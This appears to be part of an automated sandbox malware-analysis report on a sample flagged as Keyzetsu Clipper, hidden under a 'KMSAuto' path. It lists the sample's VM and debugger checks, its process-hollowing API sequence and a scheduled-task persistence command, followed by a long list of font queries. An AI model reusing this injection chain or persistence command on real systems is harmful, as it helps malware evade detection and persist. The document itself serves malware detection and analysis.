            Source: Amcache.hve.4.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.4.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.4.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.4.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.4.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: Amcache.hve.4.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.4.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: nobtpajdjthawd.exe, 00000001.00000002.1310912269.00000000011A8000.00000004.00000020.00020000.00000000.sdmp, accc.exe, 00000013.00000002.3626533610.00000000016EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Amcache.hve.4.drBinary or memory string: vmci.sys
            Source: Amcache.hve.4.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: Amcache.hve.4.drBinary or memory string: vmci.syshbin`
            Source: Amcache.hve.4.drBinary or memory string: \driver\vmci,\driver\pci
            Source: Amcache.hve.4.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.4.drBinary or memory string: VMware20,1
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.4.drBinary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.4.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.4.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.4.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.4.drBinary or memory string: VMware PCI VMCI Bus Device
            Source: Amcache.hve.4.drBinary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.4.drBinary or memory string: VMware Virtual RAM
            Source: nobtpajdjthawd.exe, 00000001.00000002.1310912269.00000000011A8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}z
            Source: Amcache.hve.4.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.4.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess queried: DebugPortJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeCode function: 0_2_031E2169 mov edi, dword ptr fs:[00000030h]0_2_031E2169
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeCode function: 0_2_031E22E6 mov edi, dword ptr fs:[00000030h]0_2_031E22E6
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 14_2_024421C5 mov edi, dword ptr fs:[00000030h]14_2_024421C5
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 14_2_02442342 mov edi, dword ptr fs:[00000030h]14_2_02442342
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 15_2_02992431 mov edi, dword ptr fs:[00000030h]15_2_02992431
            Source: C:\ProgramData\KMSAuto\accc.exeCode function: 15_2_029925AE mov edi, dword ptr fs:[00000030h]15_2_029925AE
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Contains functionality to inject code into remote processes
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeCode function: 0_2_031E2169 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_031E2169
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeMemory written: C:\Users\user\Desktop\nobtpajdjthawd.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory written: C:\ProgramData\KMSAuto\accc.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeMemory written: C:\ProgramData\KMSAuto\accc.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\Users\user\Desktop\nobtpajdjthawd.exe "C:\Users\user\Desktop\nobtpajdjthawd.exe"Jump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn Tools /tr "C:\ProgramData\KMSAuto\accc.exe" /st 12:56 /du 23:59 /sc daily /ri 1 /fJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe" Jump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp5337.tmp.bat""Jump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"Jump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeProcess created: C:\ProgramData\KMSAuto\accc.exe "C:\ProgramData\KMSAuto\accc.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 7Jump to behavior

            Language, Device and Operating System Detection

            barindex
            Yara detected Keyzetsu Clipper
            Source: Yara matchFile source: 00000013.00000002.3636637468.00000000033D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1364848533.00000000032C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000014.00000002.1364848533.00000000032CD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1312691830.0000000002FB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: nobtpajdjthawd.exe PID: 7324, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: accc.exe PID: 1228, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: accc.exe PID: 7188, type: MEMORYSTR
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeQueries volume information: C:\Users\user\Desktop\nobtpajdjthawd.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeQueries volume information: C:\Users\user\Desktop\nobtpajdjthawd.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\nobtpajdjthawd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\ProgramData\KMSAuto\accc.exe VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\ProgramData\KMSAuto\accc.exe VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\ProgramData\KMSAuto\accc.exe VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\ProgramData\KMSAuto\accc.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
